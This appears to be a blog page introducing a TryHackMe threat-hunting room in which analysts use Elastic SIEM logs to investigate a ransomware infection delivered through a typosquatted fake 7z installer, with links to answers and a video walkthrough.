Ransomware Detection Using SIEM | Elastic Search | TryHackMe Hunt Me II: Typo Squatters

We covered a scenario of Windows machine compromised with a fake 7z archiving tools designed to infect machines with Windows installer files that in turn download the ransomware from C2 servers using Powershell. The scenario discussed in the video involves the investigation of network and endpoint logs dumped from the compromised machine to hunt the indicated threats and extract the indicators of compromise. This was part of TryHackMe Hunt Me II: Typo Squatters room.

The Elastic Stack Study Notes

Open Source Intelligence (OSINT) Study Notes

The scenario

Just working on a typical day as a software engineer, Perry received an encrypted 7z archive from his boss containing a snippet of a source code that must be completed within the day. Realising that his current workstation does not have an application that can unpack the file, he spins up his browser and starts to search for software that can aid in accessing the file. Without validating the resource, Perry immediately clicks the first search engine result and installs the application.

Last September 26, 2023, one of the security analysts observed something unusual on the workstation owned by Perry based on the generated endpoint and network logs. Given this, your SOC lead has assigned you to conduct an in-depth investigation on this workstation and assess the impact of the potential compromise.

Check out the video below for detailed explanation.

Room Answers | Elastic Search | TryHackMe Hunt Me II: Typo Squatters

Room answers can be found here.

Video Walkthrough | TryHackMe Hunt Me II: Typo Squatters